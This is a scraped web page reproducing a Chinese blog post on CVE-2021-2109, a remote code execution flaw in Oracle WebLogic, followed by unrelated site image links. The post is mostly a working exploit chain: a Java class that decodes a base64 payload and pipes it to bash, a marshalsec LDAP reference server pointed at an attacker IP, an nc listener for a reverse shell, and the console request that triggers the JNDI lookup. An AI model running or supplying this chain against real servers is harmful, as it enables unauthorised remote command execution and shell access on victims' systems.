

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{public Exploit() throws Exception {//Process p = Runtime.getRuntime().exec(newString[]{"cmd","/c","calc.exe"});Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","echo'base64编码'|base64 -d |bash"});InputStream is = p.getInputStream();BufferedReader reader = new BufferedReader(new InputStreamReader(is));String line;while((line = reader.readLine()) != null) {System.out.println(line);}p.waitFor();is.close();reader.close();p.destroy();}public static void main(String[] args) throws Exception {}}
python -m SimpleHTTPServer 80
访问服务器,能看到资源就是启动成功

java -cpmarshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip.ip.ip.ip/#Exploit 9998
nc -lvnp xxxx

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://x.x.x;x:9998/s4dzak;AdminServer%22)
END
原文始发于微信公众号(NOVASEC):CVE-2021-2109 Weblogic RCE







![[笑话] 小心新版假钞-微慑信息网-VulSee.com](http://www.chinajs120.com/UpFiles/Article/200902/2009020313561460307.jpg)




![[校园] 校方回应女生穿吊带丝袜传言 称系其个人行为-微慑信息网-VulSee.com](http://www.im286.com/attachments/month_1003/100324204616a4b9c8c43053fd.jpg)

![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)

青云网
